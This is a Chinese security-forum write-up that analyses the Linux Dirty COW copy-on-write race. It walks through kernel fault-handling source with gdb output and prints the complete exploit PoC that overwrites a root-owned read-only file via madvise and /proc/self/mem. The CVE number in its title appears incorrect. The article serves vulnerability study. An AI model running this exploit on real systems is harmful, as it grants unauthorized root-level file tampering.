看雪论坛作者ID:amzilun
概 述
环 境
先导知识
mmap函数:
mma的函数原型为mmaap(void addr/映射地址,传NULL,只有内核才知道映射到哪/, size_t length/映射区大小/,int prot/映射区权限/,int flags/标志位参数/,int fd/文件描述符/,off_t offset /映射文件偏移量*/)各个参数的含义具体为:
MAP_SHARED
Share this mapping. Updates to the mapping are visible to other processes that map this file, and are carried through to the underlying file. (To precisely control when updates are carried through to the underlying file requires the use of msync(2).)
MAP_PRIVATE
Create a private copy-on-write mapping. Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file. It is unspeci‐fied whether changes made to the file after the mmap() call are visible in the mapped region.
madvise函数的解释:
Do not expect access in the near future. (For the time being, the application is finished with the given range, so the kernel can free resources associated with it.)预计再未来的一段时间不会再访问这块内存(目前程序已经结束,所以内核可以释放相应的资源)
linux系统下跨进程读写内存的方法
int f = open("/proc/self/mem",O_RDWR);
lseek(f, map, SEEK_SET);
write(f, str, strlen(str));
64位linux的四级页表映射机制(对比Windows X64)
PROC文件系统
static const struct file_operations proc_mem_operations = {
.llseek = mem_lseek,
.read = mem_read,
.write = mem_write,
.open = mem_open,
.release = mem_release,
};
该视频是一个简单的讲解,他说从进程A fork出进程B的一刹那,两个进程的物理页是共享的。
分析和运行POC
#include<stdio.h>
#include<sys/mman.h>
#include<fcntl.h>
#include<pthread.h>
#include<string.h>
void *map;
int f;
struct stat st;
char* name;
void* madviseThread(void *arg) {
char *str;
str = (char *)arg;
int i, c = 0;
for (i = 0; i < 100000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %dn", c);
}
void* procselfmemThread(void *arg) {
char *str;
str = (char *)arg;
int f = open("/proc/self/mem",O_RDWR);
int i, c = 0;
for (i = 0; i < 100000000; i++) {
lseek(f, map, SEEK_SET);
c += write(f, str, strlen(str));
}
printf("procselfmem %dn", c);
}
int main(int argc, char *argv[]) {
if (argc < 3)
return 1;
pthread_t pth1, pth2;
f = open(argv[1], O_RDONLY);
fstat(f, &st);
name = argv[1];
map = mmap(NULL, st.st_size, PROT_READ,MAP_PRIVATE, f, 0);
printf("mmap %xn",(int)map);
pthread_create(&pth1, NULL,madviseThread, argv[1]);
pthread_create(&pth2, NULL,procselfmemThread, argv[2]);
pthread_join(pth1, NULL);
pthread_join(pth2, NULL);
return 0;
}
2. 创建一个普通用户test
3. 切换到root用户并用root用户创建一个文件foo
4. 给foo写入字符串hello,并赋予权限0404
5. 切换回普通用户test,由于foo文件是root创建,导致test无法改写它。
漏洞分析
#include<stdio.h>
#include<sys/mman.h>
#include<fcntl.h>
#include<pthread.h>
#include<string.h>
#if __WORDSIZE == 64
# ifndef __intptr_t_defined
typedef long int intptr_t;
# define __intptr_t_defined
# endif
typedef unsigned long int uintptr_t;
#else
# ifndef __intptr_t_defined
typedef int intptr_t;
# define __intptr_t_defined
# endif
typedef unsigned int uintptr_t;
#endif
void *map ;
int f ;
struct stat st;
char* name;
void worker_write(void *arg)
{
char* str;
str=(char*)arg;
int f = open("/proc/self/mem",O_RDWR);
int i,c=0;
lseek(f,(uintptr_t)map,SEEK_SET);
write(f,str,strlen(str));
printf("proceselfmem %dnn",c);
}
int main(int argc,char* argv[])
{
if(argc<3)
{
(void)fprintf(stderr,"%sn","usage:dirty cow test target_file_new_content");
return 1;
}
f = open(argv[1],O_RDONLY);
fstat(f,&st);
name = argv[1];
map = mmap(NULL, st.st_size, PROT_READ,MAP_PRIVATE, f, 0);
printf("mmap %#zxn",(uintptr_t)map);
getchar();
worker_write(argv[2]);
return 0;
}
调用链
handle_pte_fault
__handle_mm_fault
handle_mm_fault
faultin_page
__get_user_pages
__get_user_pages_locked
get_user_pages_remote
__access_remote_vm
access_remote_vm
mem_rw
mem_write
__vfs_write
vfs_write
SYSC_write
SyS_write
entry_SYSCALL_64
__access_remote_vm
if (pages)
flags |= FOLL_GET;
if (write)/*在对/proc/self/mem执行写操作时,write就是1,是__access_remote_vm的最后一个参数传入的*/
flags |= FOLL_WRITE;
if (force)
flags |= FOLL_FORCE;
pages_done = 0;
lock_dropped = false;
for (;;) {
ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
vmas, locked);
把标志位设置好后进入ret = get_user_pages(tsk, mm, start, nr_pages, flags, pages,vmas, locked);(gup.c)接下来我们会深入 get_user_pages探究COW的运行原理。
正常执行COW机制中的三次"循环"
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,struct vm_area_struct **vmas, int *nonblocking)
{
...
retry:
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();
page = follow_page_mask(vma, start, foll_flags, &page_mask);
if (!page) {
int ret;
ret = faultin_page(tsk, vma, start, &foll_flags,
nonblocking);
switch (ret) {
case 0:
goto retry;
...
第一次执行follow_page_mask
(gdb) p page
$1 = (struct page *) 0x0 <irq_stack_union>
test@syzkaller:/home/POC$ ./second foo hacku
mmap 7ff31f772000
static struct page * follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags)
{
...
ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
pte = *ptep;
if (!pte_present(pte)) {
swp_entry_t entry;
if (likely(!(flags & FOLL_MIGRATION)))
goto no_page;
if (pte_none(pte))
goto no_page;
...
no_page:
pte_unmap_unlock(ptep, ptl);
if (!pte_none(pte))
return NULL;
return no_page_table(vma, flags);
ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
#define pte_offset_map_lock(mm, pmd, address, ptlp)
({
spinlock_t *__ptl = pte_lockptr(mm, pmd);
pte_t *__pte = pte_offset_map(pmd, address);
*(ptlp) = __ptl;
spin_lock(__ptl);
__pte;
})
#define pte_offset_map(pmd,addr) (__pte_map(pmd) + pte_index(addr))
从而第一次循环第一次执行page = follow_page_mask会返回空,回到__get_user_page后,由于page为空导致if (!page) 条件成立,进入if语句执行faultin_page。
(gdb) x/gx 0x7f3417146000
0x7f3417146000: Cannot access memory at address 0x7f3417146000
第一次执行faultin_page
if (*flags & FOLL_WRITE)
fault_flags |= FAULT_FLAG_WRITE;
if (*flags & FOLL_REMOTE)
fault_flags |= FAULT_FLAG_REMOTE;
if (nonblocking)
fault_flags |= FAULT_FLAG_ALLOW_RETRY;
if (*flags & FOLL_NOWAIT)
fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
if (*flags & FOLL_TRIED) {
VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
fault_flags |= FAULT_FLAG_TRIED;
}
...
if (tsk) {
if (ret & VM_FAULT_MAJOR)
tsk->maj_flt++;
else
tsk->min_flt++;
}
if (ret & VM_FAULT_RETRY) {
if (nonblocking)
*nonblocking = 0;
return -EBUSY;
}
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;
faultin_page的主要功能都在ret = handle_mm_fault(mm, vma, address, fault_flags)里;执行后发现已经挂上了物理页,证据就是0x7fd49db4d00是mmap的地址,观察地址存储的数据会看到ascii码是文件本身"hello",注意这是第一次执行该函数:
总结第一次循环:
faultin_page首先会把先前的状态写入fault_flags,如果之前由于写内存执行faultin_page,就给fault_flags加上写标志位:fault_flags |= FAULT_FLAG_WRITE;相当于记录了缺页的原因。
接下来我们会深入handle_mm_fault(mm, vma, address, fault_flags)里去一探究竟。
深入解析缺页处理函数faultin_page
int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, unsigned int flags)
{
...
ret = __handle_mm_fault(mm, vma, address, flags);
...
}
static int __handle_mm_fault(struct mm_struct *mm,struct vm_area_struct *vma,unsigned long address, unsigned int flags)
{
pgd_t *pgd;
pud_t *pud;
pmd_t *pmd;
pte_t *pte;
...
pgd = pgd_offset(mm, address);
pud = pud_alloc(mm, pgd, address);
if (!pud)
return VM_FAULT_OOM;
pmd = pmd_alloc(mm, pud, address);
if (!pmd)
return VM_FAULT_OOM;
if (pmd_none(*pmd) && transparent_hugepage_enabled(vma)) {
int ret = create_huge_pmd(mm, vma, address, pmd, flags);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
pmd_t orig_pmd = *pmd;
int ret;
barrier();
if (pmd_trans_huge(orig_pmd) || pmd_devmap(orig_pmd)) {
unsigned int dirty = flags & FAULT_FLAG_WRITE;
if (pmd_protnone(orig_pmd))
return do_huge_pmd_numa_page(mm, vma, address,
orig_pmd, pmd);
if (dirty && !pmd_write(orig_pmd)) {
ret = wp_huge_pmd(mm, vma, address, pmd,
orig_pmd, flags);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
huge_pmd_set_accessed(mm, vma, address, pmd,
orig_pmd, dirty);
return 0;
}
}
}
if (unlikely(pte_alloc(mm, pmd, address)))
return VM_FAULT_OOM;
if (unlikely(pmd_trans_unstable(pmd) || pmd_devmap(*pmd)))
return 0;
pte = pte_offset_map(pmd, address);
return handle_pte_fault(mm, vma, address, pte, pmd, flags);
}
...
barrier();
if (!pte_present(entry)) {
if (pte_none(entry)) {
if (vma_is_anonymous(vma))
return do_anonymous_page(mm, vma, address,
pte, pmd, flags);
else
return do_fault(mm, vma, address, pte, pmd,
flags, entry);
}
//当pte所对应的page不在内存中,且pte对应的内容不为0时,表示此时pte的内容所对应的页面在swap空间中,是在磁盘里
//缺页异常时会通过do_swap_page()函数来分配页面
return do_swap_page(mm, vma, address,
pte, pmd, flags, entry);
}
...
if (pte_protnone(entry))
return do_numa_page(mm, vma, address, entry, pte, pmd);
ptl = pte_lockptr(mm, pmd);
spin_lock(ptl);
if (unlikely(!pte_same(*pte, entry)))
goto unlock;
if (flags & FAULT_FLAG_WRITE) { //如果异常由写访问触发
if (!pte_write(entry))//检查是否可以写入该页,如果对应的page不可写执行do_wp_page写拷贝操作
return do_wp_page(mm, vma, address,
pte, pmd, ptl, entry);//此时必须进行写时复制的操作
entry = pte_mkdirty(entry);
}
entry = pte_mkyoung(entry);
if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
update_mmu_cache(vma, address, pte);
} else {
if (flags & FAULT_FLAG_WRITE)
flush_tlb_fix_spurious_fault(vma, address);
}
unlock:
pte_unmap_unlock(pte, ptl);
return 0;
第二次执行follow_page_mask
第一次执行follow_page_mask,由于内存延迟加载,此时虚拟地址还没有对应的物理页,返回page为空很正常,第一次执行faultin_page挂上了物理页后。
if (likely(!(flags & FOLL_MIGRATION)))
goto no_page
........
no_page:
pte_unmap_unlock(ptep, ptl);
if (!pte_none(pte))
return NULL;
return no_page_table(vma, flags);
if ((flags & FOLL_WRITE) && !pte_write(pte)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}
if (*flags & FOLL_WRITE)
fault_flags |= FAULT_FLAG_WRITE;
if (write)
flags |= FOLL_WRITE;
第二次执行faultin_page
if (flags & FAULT_FLAG_WRITE) { //如果异常由写访问触发
if (!pte_write(entry))//检查是否可以写入该页,如果对应的page不可写执行do_wp_page写拷贝操作
return do_wp_page(mm, vma, address,
pte, pmd, ptl, entry);//此时必须进行写时复制的操作
entry = pte_mkdirty(entry);
do_wp_page()是COW机制用来处理缺页的函数,里面涉及到和匿名页的代码可以不用看,和swap交换分区,内存和磁盘互相缓存的一套也和漏洞没关系,具体看do_wp_page()的一个代码片段:
if (reuse_swap_page(old_page, &total_mapcount)) {
if (total_mapcount == 1) {
page_move_anon_rmap(old_page, vma);
}
unlock_page(old_page);
return wp_page_reuse(mm, vma, address, page_table, ptl,
orig_pte, old_page, 0, 0);
}
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;
if (pages)
flags |= FOLL_GET;
if (write) /*在对/proc/self/mem执行写操作时,write就是1,是__access_remote_vm的最后一个参数传入的*/
flags |= FOLL_WRITE;
if (force)
flags |= FOLL_FORCE;
第三次执行follow_page_mask
搭建能读写物理页的内核调试环境
漏洞的成因和复现
调试遇到的麻烦和解决方法
if ((flags & FOLL_NUMA) && pmd_protnone(*pmd))
return no_page_table(vma, flags);
if (pmd_devmap(*pmd)) {
ptl = pmd_lock(mm, pmd);
page = follow_devmap_pmd(vma, address, pmd, flags);
spin_unlock(ptl);
if (page)
return page;
}
if (likely(!pmd_trans_huge(*pmd)))
致谢和参考
看雪ID:amzilun
https://bbs.pediy.com/user-home-803510.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!
本文始发于微信公众号(看雪学院):linux内核提权漏洞CVE-2016-5159
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论